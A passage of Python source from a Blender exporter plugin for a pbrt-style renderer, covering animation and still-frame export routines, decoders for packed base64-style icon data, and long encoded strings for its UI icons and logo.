    per-frame .pbrt file; when the scene "run" property is enabled the
    frame is also rendered synchronously before moving to the next one.
    The original current frame is restored afterwards.
    """
    if as_thread: print('SAR thread started')
    global MatSaved, LuxIsGUI
    MatSaved = 0
    startF = Blender.Get('staframe')
    endF = Blender.Get('endframe')
    scn = Scene.GetCurrent()
    Run = luxProp(scn, "run", "true").get()
    if Run == "true":
        # rendering each frame needs a halt criterion or it never returns
        haltspp = luxProp(scn, "haltspp", 0).get()
        if haltspp == 0:
            Draw.PupMenu("ERROR: You must set a limit for spp (Output->halt) when doing animation and the 'run' flag is switched on")
            if LuxIsGUI:
                Draw.Redraw()
            return
    print("\n\nRendering animation (frame %i to %i)\n\n"%(startF, endF))
    v_frame = Blender.Get('curframe')  # remember, so we can restore at the end
    for i in range (startF, endF+1):
        # Seems to get stuck unless we redraw the UI
        # if LuxIsGUI:
        #	Window.QRedrawAll()
        Blender.Set('curframe', i)
        print("Rendering frame %i"%(i))
        Blender.Redraw()
        frameindex = ("-%05d" % (i)) + ".pbrt"
        indexedname = sys.makename(filename, frameindex)
        unindexedname = filename
        luxProp(scn, "filename", Blender.Get("filename")).set(sys.makename(filename, "-%05d" % (Blender.Get('curframe'))))
        if Run == "true":
            # export and render this frame, blocking until it is done
            if save_lux(filename, unindexedname):
                launchLuxWait(filename, anim=True)
        else:
            save_lux(indexedname, unindexedname)
        MatSaved = 1
    # Seems to get stuck unless we redraw the UI
    # if LuxIsGUI:
    #	Window.QRedrawAll()
    Blender.Set('curframe', v_frame)
    print("\n\nFinished Rendering animation\n")
    if as_thread: print('SAR thread finished')
#### SAVE STILL (hackish...) ####
#import threading
#def save_still(filename):
# global LuxIsGUI
# scn = Scene.GetCurrent()
# to = luxProp(scn, 'export.threaded', 'true').get()
# if to == 'true' and luxProp(scn, "run", "true").get() == "true":
# import threading
# still_thread = threading.Thread(target=save_still_real, args=(filename,))
# still_thread.start()
# else:
# save_still_real(filename)
def save_still(filename):
    """Export the current frame and optionally launch pbrt on the result.

    The renderer is only spawned explicitly for file output; pipe output
    starts the render implicitly inside save_lux().
    """
    global MatSaved, runRenderAfterExport
    scn = Scene.GetCurrent()
    luxProp(scn, "filename", Blender.Get("filename")).set(sys.makename(filename, ""))
    MatSaved = 0
    unindexedname = filename
    # Seems to get stuck unless we redraw the UI
    # if LuxIsGUI:
    #	Window.QRedrawAll()
    if save_lux(filename, unindexedname):
        if runRenderAfterExport and luxProp(scn, "pipe", "false").get() == "false": #(run == None and luxProp(scn, "run", "true").get() == "true") or run:
            launchLux(filename)
    # Seems to get stuck unless we redraw the UI
    # if LuxIsGUI:
    #	Window.QRedrawAll()
######################################################
# Icons
######################################################
def base64value(char):
    """Map a base64 digit character to its 6-bit value (0-63).

    'A'-'Z' -> 0-25, 'a'-'z' -> 26-51, '0'-'9' -> 52-61, '+' -> 62;
    every other character (including '/') decodes to 63.
    """
    code = ord(char)
    if 65 <= code <= 90:       # uppercase letters
        return code - 65
    if 97 <= code <= 122:      # lowercase letters
        return code - 97 + 26
    if 48 <= code <= 57:       # digits
        return code - 48 + 52
    return 62 if char == '+' else 63
def decodeIconStr(s):
    """Decode a packed base64-style string into a 16x16 RGBA BGL byte buffer."""
    height, width = 16, 16
    buf = BGL.Buffer(BGL.GL_BYTE, [height, width, 4])
    for y in range(height):
        for x in range(width):
            for c in range(4):
                # flat character index for pixel (y, x), channel c
                idx = ((y * width) + x) * 4 + c
                buf[y][x][c] = int(base64value(s[idx]) * 4.048)
    return buf
def decodeLogoStr(s):
    """Decode a packed base64-style string into an 18x118 RGBA BGL byte buffer."""
    height, width = 18, 118
    buf = BGL.Buffer(BGL.GL_BYTE, [height, width, 4])
    for y in range(height):
        for x in range(width):
            for c in range(4):
                # flat character index for pixel (y, x), channel c
                idx = ((y * width) + x) * 4 + c
                buf[y][x][c] = int(base64value(s[idx]) * 4.048)
    return buf
def decodeArrowStr(s):
    """Decode a packed base64-style string into a 22x22 RGBA BGL byte buffer."""
    height, width = 22, 22
    buf = BGL.Buffer(BGL.GL_BYTE, [height, width, 4])
    for y in range(height):
        for x in range(width):
            for c in range(4):
                # flat character index for pixel (y, x), channel c
                idx = ((y * width) + x) * 4 + c
                buf[y][x][c] = int(base64value(s[idx]) * 4.048)
    return buf
def decodeBarStr(s):
    """Decode a packed base64-style string into a 17x138 RGBA BGL byte buffer."""
    height, width = 17, 138
    buf = BGL.Buffer(BGL.GL_BYTE, [height, width, 4])
    for y in range(height):
        for x in range(width):
            for c in range(4):
                # flat character index for pixel (y, x), channel c
                idx = ((y * width) + x) * 4 + c
                buf[y][x][c] = int(base64value(s[idx]) * 4.048)
    return buf
arrow_down = decodeArrowStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///Q///G///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///3///e///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///V///////7///D///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///1///////////e///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///a///////////////7///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///B///5///////////////////c///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///f///////////////////////7///C///A///A///A///A///A///A///A///A///A///A///A///A///A///C///6///////////////////////////c///A///A///A///A///A///A///A///A///A///A///A///A///A///i///////////////////////////////6///C///A///A///A///A///A///A///A///A///A///A///A///G///9///////////////////////////////////e///A///A///A///A///A///A///A///A///A///A///I///n///////////////////////////////////////6///N///A///A///A///A///A///A///A///A///A///L///b///e///e///e///e///e///e///e///e///e///g///O///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
arrow_right = decodeArrowStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///L///I///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///b///n///G///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////9///i///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////6///f///B///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////////5///a///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////////////////1///V///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////////////////////////3///Q///A///A///A///A///A///A///A///A///A///A///e///////////////////////////////////7///e///G///A///A///A///A///A///A///A///A///A///A///e///////////////////////////7///e///D///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////7///c///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////6///c///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///g///6///e///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///O///N///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_luxblend = decodeLogoStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAa/gA5/gAZ/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAj/gA//gAh/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAC/gAO/gAC/gAB/gAS/gAQ/gAA/gAA/gAA/gAA/gAA///A///A///A/gAA/gAZ/gAu/gA7/gA//gA//gA//gA//gA//gA//gA//gAd/gAA/gAZ/gAu/gA//gA//gA//gA//gA//gA//gA3/gAm/gAI/gAE/gAz/gA//gA//gAZ/gAA/gAA/gAA/gAZ/gA//gA//gAm/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAz/gAd/gAE/gAA/gA//gA//gAd/gAA/gAI/gAm/gA3/gA//gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gAE/gAd/gAz/gA//gA//gA//gA//gA//gA7/gAq/gAV/gAA///A///A///A///A///A///A/gAA/gAA/gAA/gAI/gAK/gAA/gAA/gAA/gAA/gAn/gA//gA//gAc/gAA/gAA/gAA/gAA///A/
//A///A/gAi/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAd/gAZ/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA7/gAE/gAE/gAz/gA//gA//gAR/gAA/gAZ/gA//gA//gAm/gAA/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAz/gAA/gA//gA//gAd/gAI/gA7/gA//gA//gA//gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gAu/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAi///A///A///A///A///A///A/gAA/gAA/gAA/gAv/gA4/gAA/gAA/gAA/gAD/gA9/gA//gA//gAz/gAA/gAA/gAA/gAA///A///A///A/gA//gA//gAq/gAI/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gA3/gAI/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAR/gAA/gAM/gA7/gA//gA7/gAZ/gA//gA//gAz/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAA/gAE/gAd/gA//gA//gAM/gA//gA//gAd/gAd/gA//gA//gAd/gAI/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAq/gAA/gAA/gAA/gAA/gAA/gAE/gAq/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAN/gAQ/gAA/gAA/gAA/gAA/gAs/gA//gA//gA+/gAs/gAp/gAZ/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAM/gA7/gA//gA//gA//gAz/gAE/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gA//gA//gAd/gAd/gA//gA//gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAM/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAI/gAA/gAE/gAZ/gAw/gA//gA//gA//gA//gAh///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAR/gA//gA//gA//gAI/gAA/gAA/gAA/gAR/gA//gA//gAm/gAd/gAd/gAd/gAd/gAd/gAd/gAd/gA3/gA//gA3/gAA/gA//gA//gAd/gAd/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAR/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAl/gAL/gAA/gAA/gAA/gAA/gAf/gA+/gAd/gAA/gAA/gAT/gA//gA//gA//gA//gA6///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/
gAA/gAE/gAz/gA//gA//gA//gAz/gAE/gAA/gAA/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAd/gAA/gA//gA//gAd/gAd/gA//gA//gAR/gAR/gAR/gAR/gAR/gAR/gAd/gA//gA//gAR/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAl/gAK/gAA/gAA/gAA/gAA/gAf/gA+/gAd/gAA/gAA/gAT/gA//gA//gA//gA//gA6///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAz/gA//gA7/gAd/gA//gA//gAm/gAA/gAA/gAR/gA//gA//gAm/gAd/gAd/gAd/gAd/gAd/gAd/gAd/gAu/gA//gA//gAI/gA//gA//gAd/gAd/gA//gA//gAd/gAR/gAR/gAR/gAR/gAR/gAq/gA//gA//gAR/gAu/gA//gA7/gAZ/gAR/gAR/gAR/gAR/gAV/gAz/gA//gA//gAA/gA3/gA//gA7/gAi/gAd/gAd/gAd/gAd/gAd/gAu/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAI/gAA/gAE/gAa/gAw/gA//gA//gA//gA//gAg///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAm/gA//gA7/gAM/gAA/gAZ/gA//gA//gAm/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gA//gA//gAd/gAE/gAz/gA//gA//gA//gA//gA//gA//gA//gA//gA//gAz/gAA/gAV/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAi/gAA/gAV/gA7/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAO/gAR/gAA/gAA/gAA/gAA/gAt/gA//gA//gA+/gAs/gAq/gAZ/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAi/gAu/gAi/gAA/gAA/gAA/gAA/gAA/gAA/gAM/gAu/gAu/gAM/gAm/gA//gA7/gAM/gAA/gAA/gAA/gAm/gA//gA//gAd/gAR/gA//gA//gAd/gAR/gAR/gAR/gAR/gAR/gAR/gAR/gAq/gA//gA//gAM/gA//gA//gAd/gAA/gAA/gAZ/gAm/gAu/gAu/gAu/gAu/gAu/gAq/gAZ/gAA/gAA/gAA/gAI/gAd/gAu/gAu/gAu/gAu/gAu/gAu/gAi/gAV/gAA/gAA/gAA/gAE/gAV/gAd/gAd/gAd/gAd/gAd/gAd/gAu/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAv/gA4/gAA/gAA/gAA/gAD/gA9/gA//gA//gAz/gAA/gAA/gAA/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAm/gAA/gA//gA//gAd/
gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAI/gAK/gAA/gAA/gAA/gAA/gAn/gA//gA//gAc/gAA/gAA/gAA/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAM/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAm/gAR/gAA/gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAC/gAO/gAC/gAB/gAS/gAP/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAj/gA//gAh/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAa/gA5/gAY/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/
//A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_blender = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wA27wAFFFGIIIsNNN5IIIsFFFG27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAFFFmnnn9sss/kkk9FFFm27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAEEEvwww/AAA/sss/EEEv27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAFFFxzzz/xxx/vvv/FFFx27wA27wA27wA27wA27wA///A27wAGGGRLLLtKKK7KKK9JJJ/111/ppp/xxx/III/JJJ9JJJ7LLLtGGGR27wA///AGGGQPPP8xxx/444/vvv/555/333/999/zzz/xxx/jjj/nnn/nnn/OOO8GGGQ///ALLL2222/zzz/lll/+++/888/666/444/222/000/yyy/aaa/nnn/vvv/LLL2///AMMMxqqq/+++/ttt/////AAA/888/666/444/AAA/000/iii/zzz/nnn/MMMx///AGGGKLLLqKKK7ZZZ/yyy/yyy/yyy/888/vvv/ttt/rrr/VVV/JJJ7LLLqGGGK///A27wA27wA27wAJJJ1999+////sss5UUU8qqq5777/333+III127wA27wA27wA///A27wA27wA27wAHHHJMMMzUUU7GGGpHHHIGGGpSSS7MMMzHHHJ27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_col = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wAVIAPXKB5VIAS27wA27wA27wA27wA///A///A///A///A///A27wA27wA27wAVIAPXKB8shU/XLC9VIAS27wA27wA27wA///A///A///A///A///A27wA27wAVIAPXKB8ymU/7xd/0qb/XLC9VIAS27wA27wA///A///A///A///A///A27wAVIAPXKA8xkO/7uW/7wa/7xd/0qb/XLC9VIAS27wA///A///A///A///A///AVIAPXKA8xiJ/6rO/6sS/7uW/7wZ/7xd/0qa/XLC9VIAS///A///A///A///A///AXKA1ypd/+6z/6rO/6rO/6sS/7uW/7vZ/7xd/shT/XKB5///A///A///A///A///AVJAMYMC873w/+6z/6rO/6rO/6sS/7uV/ymT/XKB8VIAP///A///A///A///A///A27wAVJAMYMC873w/+6z/6rO/6rO/xkN/XKB8VIAP27wA///A///A///A///A///A27wA27wAVJAMYMC873w/+6z/xiJ/XKA8VIAP27wA27wA///A///A///A///A///A27wA27wA27wAVJAMYMC8xpc/XKA8VIAP27wA27wA27wA///A///A///A///A///A27wA27wA27wA27wAVJAMXKA1VIAP27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_float = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wAMMMSOOO5MMMP27wA27wA27wA27wA///A///A///A///A///A27wA27wA27wAMMMSPPP9nnn/PPP8MMMP27wA27wA27wA///A///A///A///A///A27wA27wAMMMSPPP9ttt/333/vvv/PPP8MMMP27wA27wA///A///A///A///A///A27wAMMMSOOO9ppp/zzz/111/333/vvv/PPP8MMMP27wA///A///A///A///A///AMMMSOOO9lll/uuu/www/zzz/111/333/vvv/PPP8MMMP///A///A///A///A///AOOO5sss/666/sss/uuu/www/zzz/111/333/kkk/PPP1///A///A///A///A///AMMMPQQQ8444/666/ttt/uuu/www/zzz/ppp/OOO8MMMM///A///A///A///A///A27wAMMMPQQQ8444/666/ttt/uuu/mmm/OOO8MMMM27wA///A///A///A///A///A27wA27wAMMMPQQQ8444/555/jjj/OOO8MMMM27wA27wA///A///A///A///A///A27wA27wA27wAMMMPQQQ8ppp/OOO8MMMM27wA27wA27wA///A///A///A///A///A27wA27wA27wA27wAMMMPOOO1MMMM27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_map2d = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wA27wAMMMUMMMzMMMzMMMU27wA27wA27wA27wA27wA///A///A27wA27wA27wANNNPMMMyYVQ/wnV/bbb/RRR/MMMyNNNP27wA27wA27wA///A///A27wAMMMLMMMtWUQ/vnZ/7vY/6rP/aaa/eee/ZZZ/PPP/MMMtMMML27wA///A///AMMMfTSQ/tnc/7yg/7uV/6qN/6qM/YYY/ZZZ/ddd/fff/YYY/OOO/MMMf///A///AMMM/71o/7wb/6sQ/rgK/dVG/6qM/YYY/ZZZ/bbb/ccc/fff/ggg/MMM////A///AMMM/92q/AAA/6rP/dVH/AAA/6qM/YYY/ZZZ/bbb/ccc/eee/iii/MMM////A///AMMM/93r/dWI/6rP/dVH/AAA/6qM/XXX/ZZZ/bbb/ccc/eee/iii/MMM////A///AMMM/94t/6sR/6rQ/6rO/6qN/6qM/XXX/ZZZ/bbb/ccc/eee/jjj/MMM////A///AMMM/94u/dWI/dVI/6rP/6rN/6qM/XXX/ZZZ/bbb/ccc/eee/kkk/MMM////A///AMMM/+5v/AAA/AAA/6rP/7vX/94t/xxx/ggg/bbb/ccc/eee/lll/MMM////A///AMMM/+5x/6sR/7xd/+6y/////////////////111/mmm/eee/mmm/MMM////A///AMMM/+72//96/////////////////////////////////666/vvv/MMM////A///AMMMiTTS/wuq/986/////////////////////////555/ppp/SSS/MMMi///A///A27wAMMMHMMMdMMM0aZX/0yu/+97/888/uuu/XXX/MMM0MMMdMMMH27wA///A///A27wA27wA27wA27wANNNLMMMhMMM3MMM3MMMhNNNL27wA27wA27wA27wA///A")
icon_map2dparam = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wAQQQB27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA///A///A27wAUUUwMMM9EEE3AAAvAAAlAAAbAAAI27wA27wA27wA27wA27wA27wA///A///A27wAeeeOVVV9OOO/MMM/CCC/AAA+AAA9AAAg27wA27wA27wA27wA27wA///A///A27wA27wAfffKWWW9ggg/mmm/TTT/AAA/AAA9AAAS27wA27wA27wA27wA///A///A27wA27wA27wAeeeXVVV9hhh/lll/TTT/BBB/BBB6AAAN27wA27wA27wA///A///A27wAAAAK27wA27wAdddgTTT8NNN/NNN/JJJ/VVV9EEE8AAAoAAAG27wA///A///A27wAAAAXAAAA27wA27wAeeeaVVV2QQQ/nnn+222/mmm/PPP9JGF8KGCX///A///A27wAAAAkAAAA27wA27wA27wA27wAVVVXYYY8+++/333/gec+ZPL+XOJq///A///A27wAAAAxAAAB27wA27wA27wA27wA27wAXXXiiii83219ofY8eUO/aQL2///A///A27wAAAA9AAAC27wA27wA27wA27wA27wAgggAWWVwmgc84yt/oeW/gWP1///A///ACCC6AAA/AAA/CCC627wA27wA27wA27wA27wAKFFDKGDzxsm52wq/peW2///A///AAAA/////////AAA/AAABAAAAAAAAAAAA27wA27wALFCFMHE31wr61uo5///A///AAAA/////////AAA/AAA+AAAzAAAmAAAZAAAM27wA27wAKFDJPLH6umez///A///ACCC6AAA/AAA/CCC627wA27wA27wA27wA27wA27wA27wA27wAKFCOOJFf///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
